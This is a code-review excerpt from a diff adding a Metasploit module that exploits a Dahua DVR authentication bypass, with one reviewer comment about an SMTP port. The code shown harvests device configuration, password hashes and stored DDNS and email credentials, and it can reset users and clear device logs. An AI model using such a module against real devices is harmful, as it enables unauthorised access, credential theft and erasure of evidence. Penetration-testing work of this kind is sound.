modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,383 @@
+    sock.put(CLEAR_LOGS2)
+    print_good("LOGS CLEARED! @ #{rhost}:#{rport}")
+  end
+
+  def run_host(ip)
+    # user8pwhash = "4WzwxXxM" #888888
+    # user6pwhash = "sh15yfFM" #666666
+    # useradminpwhash = "6QNMIQGe" #admin
+    connect
+    sock.put(U1)
+    data = sock.recv(8)
+    disconnect
+    if data == DVR_RESP
+      print_good("DVR FOUND: @ #{rhost}:#{rport}!")
+      report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR")
+      # needs boolean logic to run or not run
+      if datastore['VERSION_INFO']
+        grab_version
+      end
+      # needs boolean logic to run or not run
+      if datastore['SN_INFO']
+        grab_sn
+      end
+      # needs boolean logic to run or not run
+      if datastore['EMAIL_INFO']
+        grab_email
+      end
+      # needs boolean logic to run or not run
+      if datastore['DDNS_INFO']
+        grab_ddns
+      end
+      # needs boolean logic to run or not run
+      if datastore['NAS_INFO']
+        grab_nas
+      end
+      # needs boolean logic to run or not run
+      if datastore['CHANNEL_INFO']
+        grab_channels
+      end
+      # needs boolean logic to run or not run
+      if datastore['USER_INFO']
+        grab_users
+      end
+      # needs boolean logic to run or not run
+      if datastore['GROUP_INFO']
+        grab_groups
+      end
+      if datastore['RESET']
+        reset_user
+      end
+
+      if datastore['CLEAR_LOGS']
+        clear_logs
+      end
+      disconnect
+    end
+  end
+
+  def report_hash(rhost, rport, user, hash)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'dahua_dvr',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: hash,
+      private_type: :nonreplayable_hash,
+      jtr_format: 'dahua_hash',
+      username: user
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
+    service_data = {
+      address: ddns_server,
+      port: ddns_port,
+      service_name: 'ddns settings',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: ddns_pass,
+      private_type: :password,
+      username: ddns_user
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_email_cred(mailserver, rport, muser, mpass)
+    service_data = {
+      address: mailserver,
+      port: rport,
```

Comment:
rport here seems to correspond to `RPORT`, which seems incorrect here.  IMO, you should just use 25 for SMTP or otherwise parse it from the config.